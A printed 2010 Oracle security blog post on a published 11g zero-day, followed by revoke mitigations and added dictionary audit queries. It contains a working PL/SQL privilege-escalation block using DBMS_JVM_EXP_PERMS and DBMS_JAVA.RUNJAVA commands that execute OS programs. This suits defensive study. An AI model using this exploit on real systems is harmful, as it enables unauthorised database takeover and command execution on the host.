- Alexander Kornbrust Oracle Security Blog - http://blog.red-database-security.com -
Oracle 11g 0day exploit published
This entry was posted by Alexander Kornbrust on 4 Feb 2010 @ 22:27 in Exploit, David Litchfield | Comments disabled
I just read on Sumit Siddarth’s (Sid) [1] blog that the video recording from David Litchfield’s BH presentation is [2] online.
David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;
For security reasons you should:
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on "oracle/aurora/util/Wrapper" from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.
SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3');
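To confirm that the revokes listed above took effect, and to spot Java policy rows like the one the PL/SQL block imports, the following audit queries can be run against the data dictionary. This is an added example, not code from the original post; it assumes access to the DBA_* views, and the grantee exclusion list in the third query is an assumption to adapt to your own baseline.

```sql
-- Added audit example (not from the original post).
-- Run as a user with SELECT access to the DBA_* dictionary views.

-- 1. Any row returned here means PUBLIC can still execute one of the
--    objects the post says to lock down.
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND table_name IN ('DBMS_JAVA',
                      'DBMS_JAVA_TEST',
                      'DBMS_JVM_EXP_PERMS',
                      'oracle/aurora/util/Wrapper')
 ORDER BY table_name;

-- 2. Everyone who can execute DBMS_JVM_EXP_PERMS. After the fix the
--    grantees should be limited to IMP_FULL_DATABASE and EXP_FULL_DATABASE.
SELECT grantee, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_JVM_EXP_PERMS'
   AND privilege = 'EXECUTE'
 ORDER BY grantee;

-- 3. Java policy rows of the kind the PL/SQL block imports: an execute
--    FilePermission on <<ALL FILES>> held by an ordinary grantee.
--    The exclusion list is an assumption; adjust it to your baseline.
SELECT grantee, kind, type_name, name, action, enabled, seq
  FROM dba_java_policy
 WHERE kind = 'GRANT'
   AND type_name = 'java.io.FilePermission'
   AND name = '<<ALL FILES>>'
   AND LOWER(action) LIKE '%execute%'
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV', 'JAVA_ADMIN')
 ORDER BY grantee;
```

Rows from the first or third query on a database that has had the revokes applied are worth investigating as either an incomplete fix or a sign the policy import was already used.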
Article printed from Alexander Kornbrust Oracle Security Blog: http://blog.red-database-security.com
URL to article: http://blog.red-database-security.com/2010/02/04/oracle-11g-0day-exploit-published/
URLs in this post:
[1] blog: http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/
[2] online: https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov